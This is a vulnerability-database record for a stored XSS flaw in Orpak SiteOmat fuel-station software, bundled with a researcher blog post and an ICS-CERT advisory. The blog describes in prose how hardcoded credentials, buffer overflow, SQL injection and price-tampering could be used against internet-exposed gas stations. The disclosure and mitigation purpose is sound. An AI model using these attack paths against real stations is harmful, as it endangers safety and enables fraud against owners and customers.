{"id": "CVE-2017-14850", "bulletinFamily": "NVD", "title": "CVE-2017-14850", "description": "All known versions of the Orpak SiteOmat web management console is vulnerable to multiple instances of Stored Cross-site Scripting due to improper external user-input validation. An attacker with access to the web interface is able to hijack sessions or navigate victims outside of SiteOmat, to a malicious server owned by him.", "published": "2019-06-03T19:29:00", "modified": "2019-06-04T19:47:00", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14850", "reporter": "cve@mitre.org", "references": ["https://ics-cert.us-cert.gov/advisories/ICSA-19-122-01", "http://www.securityfocus.com/bid/108167", "https://www.orpak.com"], "cvelist": ["CVE-2017-14850"], "type": "cve", "lastseen": "2020-12-09T20:13:24", "edition": 6, "viewCount": 35, "enchantments": {"dependencies": {"references": [{"type": "securelist", "idList": ["SECURELIST:B6F614DF1363BE33528186803A2C177D"]}, {"type": "ics", "idList": ["ICSA-19-122-01"]}], "modified": "2020-12-09T20:13:24", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2020-12-09T20:13:24", "rev": 2}, "vulnersScore": 4.5}, "cpe": [], "affectedSoftware": [{"cpeName": "orpak:siteomat", "name": "orpak siteomat", "operator": "lt", "version": "6.4.414.084"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 2.7}, "cpe23": [], "cwe": ["CWE-79"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:orpak:siteomat:6.4.414.084:*:*:*:*:*:*:*", "versionEndExcluding": "6.4.414.084", "vulnerable": true}], "operator": "OR"}]}}

{"securelist": [{"lastseen": "2018-02-22T14:50:37", "bulletinFamily": "blog", "cvelist": ["CVE-2017-14728", "CVE-2017-14850", "CVE-2017-14851", "CVE-2017-14852", "CVE-2017-14853", "CVE-2017-14854"], "description": "\n\nA few months ago, while undertaking unrelated research into online connected devices, we uncovered something surprising and realized almost immediately that we could be looking at a critical security threat. What we found was a simple purple web interface that was in fact a link to a real-life gas station, and we suspected this link made the station remotely hackable.\n\nAmihai Neiderman, then working for Azimuth security, and I investigated the findings. When our suspicions turned out to be true, we reported them to the vendor.\n\nThe story was covered recently by [Motherboard VICE](<https://motherboard.vice.com/en_us/article/43qkgb/flaws-in-gas-station-software-let-hackers-change-prices-steal-fuel-erase-evidence>), and here we will share some of the technical details behind it. Further details of this research will be shared in early March at the [Security Analyst Summit 2018](<https://sas.kaspersky.com/>) in Cancun.\n\nThe device we investigated was not just a tiny web interface. It was an embedded box running a Linux-based controller unit that was installed with a tiny httpd server.\n\nAccording to its manufacturer, the controller's software is a site automation device that is responsible for managing every component of the station, including dispensers, payment terminals and more.\n\nMore specifically, the controller is at the heart of the station and if an intruder finds a way to take over the box, the results could be catastrophic. Another worrying detail, discovered later in the research, was when the solution was installed \u2013 many instances were embedded in fueling systems _over a decade ago_ and have been connected to the internet ever since.\n\nBefore the research, we honestly believed that all fueling systems, without exception, would be isolated from the internet and properly monitored. But we were wrong. With our experienced eyes, we came to realize that even the least skilled attacker could use this product to take over a fueling system from anywhere in the world.\n\n## Hide &amp; seek\n\nThe fuel stations we found using this product carried a watermark that can be found by running a search query with just one keyword. Within a few seconds, all those that are connected reveal their exact location and listening services.\n\nThe following chart uses data from an online search engine and other sources to show the geographical spread of the fuel stations. We found that more than 1,000 gas stations are accessible from any computer in the world. And when it comes to [IoT](<https://securelist.com/threats/internet-of-things-glossary?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) hacking, gas stations are a far more dangerous target than webcams, for example.\n\n[](<https://securelist.com/files/2017/12/171228_expensive_gas-2.png>)_Top countries with gas stations open to the internet (data from Shodan and telemetry sources)_\n\nMost of the research involved reviewing the information available online. It seems that the manufacturer posted much of the device's technical information, allowing clients to go online and grab it. The user manuals were very detailed. They included screenshots, default credentials, different commands and a step-by-step guide on how to access and manage each of the interfaces. That alone assisted us in gaining all the information we needed, before we even wrote a single line of code.\n\nWe understood how obsolete the device was when we realized it was operative and accessible remotely using services you don't expect to see in modern devices. The user manual carefully listed the services it was using and the network architecture. Understanding how the device operates in the network doesn't require special hacking skills.\n\n[](<https://securelist.com/files/2017/12/171228_expensive_gas-3-5.jpg>)_Network layout showing the main controller unit and its access privileges_\n\n## Default credentials\n\nWe found many places where default credentials were mentioned. Using the online search engine, we even saw proof that the services listed in the manual were scraped by the engine at some point in time. Since the engine itself is fairly new, it is believed that the services are also accessible. Among the rest, SSH, HTTP and X11 were marked as potential access backdoors.\n\n[](<https://securelist.com/files/2017/12/171228_expensive_gas-4.png>)_Shift management login page with security issues allowing complete bypass_\n\nDuring the research, we were able to log in to one shift management console. But that was just one instance \u2013 how could we be sure that all the other stations were accessible as well? We needed to ask permission from a gas station owner to let us access the station when it was offline.\n\nWe wanted to understand what exactly was behind that web interface. Did it have the same functionality as a web camera, or could we actually find a critical issue that could cause major damage?\n\n[](<https://securelist.com/files/2017/12/171228_expensive_gas-5-e1514452916698.png>)\n\nThe shift management console\n\nThe console appeared very robust. Considering the level of technical knowledge a shift manager is required to have, the functionality would allow them to pretty much change the dispenser settings, including gas station prices, printer settings, shift reports and more. The risk here stems from a malicious insider \u2013 a shift manager can modify shift reports, printed receipts and the actual gas price. We believe that such privileges should be reserved for the gas station owner only. In addition, we suspect that there are more interfaces in the network which allow a shift employee to track the convenience store and payment terminal using high privileges as well. In the sketch above, there was no mention of any protection software in place.\n\n[](<https://securelist.com/files/2018/02/expensive_gas-6_n.png>)\n\n_Functionality to change gas prices available to gas station shift manager_\n\nThe next step in the research was to verify if we could access the station remotely without any credentials. We started looking for creative ways to bypass the authentication mechanism. Presuming it was obsolete and not properly tested before being deployed, we didn't expect it to take more than a day or two.\n\n## A snake in the haystack\n\nWe were positive that a coding vulnerability would be the first thing to surface, but it was something we least expected to find that first caught our attention.\n\nOnce the initial firmware dump and main binary reversing step was completed, we searched for the login mechanism within the decompiled code. To our surprise, the following 'if' condition was a core part of that mechanism. It was a hardcoded username and password. In other words, a manufacturer backdoor for cases when the device requires remote or local access with the highest privileges.\n\n[](<https://securelist.com/files/2017/12/171228_expensive_gas-7.png>)_Hardcoded credentials, a zero-day vulnerability reserved with _[_CVE-2017-14728_](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-14728>)\n\nEvery similar device belonging to that vendor, up to the version we found, contained these hardcoded credentials. We reported our findings to MITRE to reserve the CVE, and contacted the vendor.\n\nIn addition to hardcoded passwords, we found many areas that we suspect contain insecure code and which might allow code to be executed remotely. One of these components - soWebServer::XMLGetMeansReportRowsNumber code review boiled down to a name parameter which is being controlled by the end user and is prone to a stack-based buffer overflow attack. Based on that finding, we compiled a fully working remote code execution. Part of that code is in the following screenshot.\n\n[](<https://securelist.com/files/2018/02/171228_expensive_gas-66.png>)_Code for remote login and stack buffer overflow_\n\nAnother code area which captured our attention was an authentication component which contained SQL injection. Throughout the entire analysis, we haven't found SQL injection preventions to be sufficient. This is one example:\n\n[](<https://securelist.com/files/2018/02/171228_expensive_gas-67.png>)_Code to extract gas station's name and location_\n\n## Geo exploitation\n\nIt is perfectly plausible that an IP address shows the actual location of a gas station, but we wanted to dig even further into the code and understand whether a gas station owner actually inputs the name of the gas station, or any location ID that can be traced, to find the actual location, gas vendor and other information related to that location.\n\nWe found an XML component which is responsible for generating reports on a daily basis. It was found to contain a parameter that holds the actual name and location of the station. We wrote a quick proof of concept to simply extract this parameter's value.\n\n[](<https://securelist.com/files/2018/02/expensive_gas-11.png>)\n\n_Code to extract gas station's name and location_\n\nAs said, the code was not tested globally, but in the one case we had, it did extract the name, which after a few searches retrieved the exact location, vendor name and contact details.\n\n## Update price\n\nGiven the possibility of utilizing the hardcoded credentials to access the SiteOmat's web interface and tamper with the **update_price.cgi** component's input parameters, an intruder would be able to change the fuel price. To reproduce such attempt, first thing that needs to be done is to extract the victim dispenser's information in a JSON format, to better understand which products are being sold and for what price. This can be achieved using one of the XML files responsible for storing the real-time prices in the local database.\n\n[](<https://securelist.com/files/2018/02/171228_expensive_gas-68.png>)_Code snippet taken from the price modification proof of concept_\n\nEach product has an ID, a gas type, a name following the type and price. An intruder only needs to modify the gas type in order to update the price.\n\nOnce the intruder decides which of the prices to change, they will have to query for the relative CGI component that changes the price.\n\n## The payment terminal\n\nAn intruder that gains access to the gas station is able to connect directly to the payment terminal, and either extract payment information or directly exploit the payment bridge to steal transactions. We did not cover that area in our research since we lacked the access to the gas station network, though we strongly believe that it requires inspection and testing.\n\n## What an intruder can do\n\nTo give you some idea of the capabilities an intruder gains when taking over a gas station system through the vulnerable device we uncovered, here are a few scenarios:\n\n * Shut down all fueling systems\n * Cause fuel leakage and risk of casualties\n * Change fueling price\n * Circumvent payment terminal to steal money\n * Scrape vehicle license plates and driver identities\n * Halt the station's operation, demanding a ransom in exchange\n * Execute code on the controller unit\n * Move freely within the gas station network\n\nTo the best of our knowledge, the vulnerable gas stations have not yet been asked to disable remote access through this controller. On September of 2017, we alerted the vendor to the issues and offered to send full technical details to help ensure the vulnerabilities could be fixed.\n\nThe [Motherboard Vice](<https://motherboard.vice.com/en_us/article/43qkgb/flaws-in-gas-station-software-let-hackers-change-prices-steal-fuel-erase-evidence>) article referenced a recent incident in Moscow where a hacker helped to fraudulently siphon gas from customers using malicious code \u2013 but we do not believe this incident is related to the area of our research. Our online search did not find any gas stations in Russia with this controller installed, and a recent presentation in Moscow of our ongoing research did not make public the name of the product, its manufacturer or technical details of the vulnerabilities.\n\nMITRE received reports on the vulnerabilities found during the research, though triage is still in process. CERT IL &amp; US were also updated with details about the vulnerabilities.\n\n## Reported vulnerabilities - MITRE\n\n**Reserved CVEs** | **Description** \n---|--- \nCVE-2017-14728 | Hardcoded Administrator Credentials \nCVE-2017-14850 | Persistent XSS \nCVE-2017-14851 | SQL Injection \nCVE-2017-14852 | Insecure Communication \nCVE-2017-14853 | Code injection \nCVE-2017-14854 | Buffer Overflow allows RCE", "modified": "2018-02-07T10:00:22", "published": "2018-02-07T10:00:22", "href": "https://securelist.com/expensive-gas/83542/", "id": "SECURELIST:B6F614DF1363BE33528186803A2C177D", "type": "securelist", "title": "Gas is too expensive? Let\u2019s make it cheap!", "cvss": {"score": 0.0, "vector": "NONE"}}], "ics": [{"lastseen": "2020-12-18T03:21:38", "bulletinFamily": "info", "cvelist": ["CVE-2017-14850", "CVE-2017-14853", "CVE-2017-14854", "CVE-2017-14851", "CVE-2017-14852", "CVE-2017-14728"], "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 9.8**\n\n * **ATTENTION: **Exploitable remotely/low skill level to exploit/public exploits available\n * **Vendor:** Orpak (acquired by Gilbarco Veeder-Root)\n * **Equipment: **SiteOmat\n * **Vulnerabilities: **Use of Hard-coded Credentials, Cross-site Scripting, SQL Injection, Missing Encryption of Sensitive Data, Code Injection, Stack-based Buffer Overflow\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of these vulnerabilities could result in arbitrary remote code execution resulting in possible denial-of-service conditions and unauthorized access to view and edit monitoring, configuration, and payment information.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following versions of SiteOmat, software for fuel station management, are affected:\n\n * SiteOmat versions prior to 6.4.414.122 only are vulnerable to stack-based buffer overflow CVE-2017-14854 and Code Injection CVE-2017-14853\n * SiteOmat Versions prior to 6.4.414.084\n\n### 3.2 VULNERABILITY OVERVIEW\n\n#### 3.2.1 [USE OF HARD-CODED CREDENTIALS CWE-798](<https://cwe.mitre.org/data/definitions/798>)\n\nThe application utilizes hard coded username and password credentials for application login.\n\n[CVE-2017-14728](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14728>) has been assigned to this vulnerability. A CVSS v3 base score of 9.8 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>)).\n\n#### 3.2.2 [IMPROPER NEUTRALIZATION OF INPUT DURING WEB PAGE GENERATION ('CROSS-SITE SCRIPTING') CWE-79](<https://cwe.mitre.org/data/definitions/79.html>)\n\nThe application web interface does not properly neutralize user-controllable input, which could allow cross-site scripting.\n\n[CVE-2017-14850](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14850>) has been assigned to this vulnerability. A CVSS v3 base score of 6.1 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N>)).\n\n#### 3.2.3 [IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN SQL COMMAND ('SQL INJECTION') CWE-89](<https://cwe.mitre.org/data/definitions/89.html>)\n\nThe application does not properly sanitize external input, which may allow an attacker to access the product by specially crafted input.\n\n[CVE-2017-14851](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14851>) has been assigned to this vulnerability. A CVSS v3 base score of 9.4 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L>)).\n\n#### 3.2.4 [MISSING ENCRYPTION OF SENSITIVE DATA CWE-311](<https://cwe.mitre.org/data/definitions/311.html>)\n\nThe application transmits information in plain text, including credentials, which could allow an attacker with access to transmitted data to obtain credentials and bypass authentication.\n\n[CVE-2017-14852](<https://nvd.nist.gov/vuln/detail/CVE-2017-14852>) has been assigned to this vulnerability. A CVSS v3 base score of 8.6 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L>)).\n\n#### 3.2.5 [IMPROPER CONTROL OF GENERATION OF CODE ('CODE INJECTION') CWE-94](<https://cwe.mitre.org/data/definitions/94.html>)\n\nThe application does not properly restrict syntax from external input, which could allow unauthenticated users to execute specially crafted code on the target system.\n\n[CVE-2017-14853](<https://nvd.nist.gov/vuln/detail/CVE-2017-14853>) has been assigned to this vulnerability. A CVSS v3 base score of 8.6 has been assigned; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L>)).\n\n#### 3.2.6 [STACK-BASED BUFFER OVERFLOW CWE-121](<https://cwe.mitre.org/data/definitions/121.html>)\n\nThe application utilizes a function that accepts user input. This input is not properly validated, which could allow an attacker to execute arbitrary code.\n\n[CVE-2017-14854](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-14854>) has been assigned to this vulnerability. A CVSS v3 base score of 9.1 has been calculated; the CVSS vector string is ([AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H)](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H>).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Commercial Facilities, Energy, Transportation Systems\n * **COUNTRIES/AREAS DEPLOYED:** Worldwide\n * **COMPANY HEADQUARTERS LOCATION:** Israel\n\n### 3.4 RESEARCHER\n\nIdo Naor and Amihai Naiderman of Kaspersky Lab reported these vulnerabilities to NCCIC.\n\n## 4\\. MITIGATIONS\n\nOrpak recommends users of affected versions update to the latest release v6.4.414.139 or later. The update can be obtained by contacting customer care with the following options:\n\nOnline Ticket (login required): <https://support.zoho.com/portal/orpak/home>\n\nEmail: [support@orpak.com](<mailto:support@orpak.com>)\n\nTel: +972 3 577 6864\n\nNCCIC recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.\n * Restrict system access to authorized personnel only and follow a least privilege approach.\n * Apply defense-in-depth strategies.\n * Disable unnecessary accounts and services.\n\nNCCIC reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures. \n \nNCCIC also provides a section for control systems security recommended practices on the ICS-CERT web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nAdditional mitigation guidance and recommended practices are publicly available on the ICS-CERT website in the Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies. \n \nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to NCCIC for tracking and correlation against other incidents.\n\n## \nContact Information\n\nFor any questions related to this report, please contact the CISA at: \n \nEmail: [CISAservicedesk@cisa.dhs.gov](<mailto:cisaservicedesk@cisa.dhs.gov>) \nToll Free: 1-888-282-0870\n\nFor industrial control systems cybersecurity information: https://us-cert.cisa.gov/ics \nor incident reporting: https://us-cert.cisa.gov/report\n\nCISA continuously strives to improve its products and services. You can help by choosing one of the links below to provide feedback about this product.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ics/advisories/ICSA-19-122-01>); we'd welcome your feedback.\n", "edition": 12, "modified": "2019-05-06T00:00:00", "published": "2019-05-02T00:00:00", "id": "ICSA-19-122-01", "href": "https://www.us-cert.gov//ics/advisories/ICSA-19-122-01", "title": "Orpak SiteOmat", "type": "ics", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}